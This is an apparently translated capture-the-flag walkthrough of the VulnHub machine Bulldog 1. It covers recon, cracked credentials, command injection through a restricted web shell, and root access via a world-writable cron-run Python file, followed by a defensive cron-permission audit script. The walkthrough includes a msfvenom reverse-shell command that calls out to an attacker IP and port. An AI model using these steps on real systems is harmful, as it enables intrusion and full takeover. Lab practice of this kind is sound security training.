Vulnhub target machine: BULLDOG 1

Introduction

Series: Bulldog (2 machines in this series)
Release date: August 28, 2017
Difficulty: Intermediate
Operating environment: VirtualBox
Goal: Obtain root privileges
Learning:

  • Directory brute-forcing
  • Password cracking
  • Bash reverse shell
  • Python file privilege escalation
  • Scheduled task privilege escalation

Target machine address: https://www.vulnhub.com/entry/bulldog-1,211/

Information gathering

Host discovery

Host discovery with netdiscover

sudo netdiscover -i eth1 -r 192.168.56.0/24

Host information detection

nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106

Website detection

The homepage of the website is a static page. There is no valuable information in the page source, so go straight to directory brute-forcing.

Directory brute-forcing

dirsearch -u http://192.168.56.106/ --full-url -x 404

The scan turns up an admin (back-end) address and a dev address. Visit http://192.168.56.106/dev/ and view the source code of the page to find some passwords.
Use an online website to decrypt them.
This yields two sets of credentials:

nick:bulldog
sarah:bulldoglover

Command execution

Log in to the admin back end: http://192.168.56.106/admin/
Then you can access: http://192.168.56.106/dev/shell/
It seems to be a command execution vulnerability, but it limits the commands that can be used.
The list of allowed commands includes echo, so it should be possible to implement a reverse shell with the help of bash.

Scheduled task privilege escalation

A sensitive file is found here. Searching shows that it is used by a crontab scheduled task that runs once every minute: /.hiddenAVDirectory/AVApplication.py is executed by the root user.
The next steps follow a previous write-up: https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d

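# Search for all files that are owned by root, are executable by owner and group, and are writable by other users
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

# Recursively search from the root directory for files whose contents mention AVApplication.py, printing the file name and matching line number
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null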

  1. Generate a Python reverse shell command and write it into the py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw

Use the vi editor to open the py file and write in the reverse shell command generated above. The generated command is obfuscated; don't worry about it.

  2. Wait up to 1 minute and you will get the shell
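The escalation above depends on one misconfiguration: a root cron job that runs a file other users can modify. The following audit is an added example, not part of the original write-up; it parses /etc/crontab-style entries and reports files or parent directories referenced by root jobs that are world-writable or not owned by root. The function names and the choice of checks are assumptions made for illustration.

```python
import glob
import os
import re
import stat

# Absolute paths inside a cron command (stops at whitespace and shell metacharacters).
PATH_RE = re.compile(r"(?<![\w.])/[^\s;|&<>\"'`$()]+")

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines, which carry a user field."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
            continue  # blank line, comment, or VAR=value environment setting
        # "@reboot user cmd" has 1 schedule field; "m h dom mon dow user cmd" has 5.
        parts = line.split(None, 2 if line.startswith("@") else 6)
        if len(parts) == (3 if line.startswith("@") else 7):
            yield parts[-2], parts[-1]

def modifiable_by_others(path, trusted_uid=0):
    """Return the reasons an account other than trusted_uid could change `path`."""
    try:
        st = os.stat(path)
    except OSError:
        return []  # missing or unreadable: nothing to assess here
    if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
        return []  # skip device nodes such as /dev/null
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}")
    # In a sticky directory (e.g. /tmp) only a file's owner can delete or rename it.
    sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
    if st.st_mode & stat.S_IWOTH and not sticky_dir:
        reasons.append("world-writable")
    return reasons

def audit_crontab(text, trusted_uid=0):
    """Return (path, reason) pairs for files and parent directories used by root jobs."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in PATH_RE.findall(command):
            for target in (path, os.path.dirname(path)):
                findings += [(target, r) for r in modifiable_by_others(target, trusted_uid)]
    return findings

if __name__ == "__main__":
    for cron_file in glob.glob("/etc/crontab") + glob.glob("/etc/cron.d/*"):
        with open(cron_file, errors="replace") as fh:
            for target, reason in audit_crontab(fh.read()):
                print(f"{cron_file}: {target} is {reason}")
```

On a machine configured like this target, the fix for a reported file is to remove write access for other users (for example mode 755 with root ownership) on both the script and its directory.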

Origin blog.csdn.net/weixin_44288604/article/details/131250526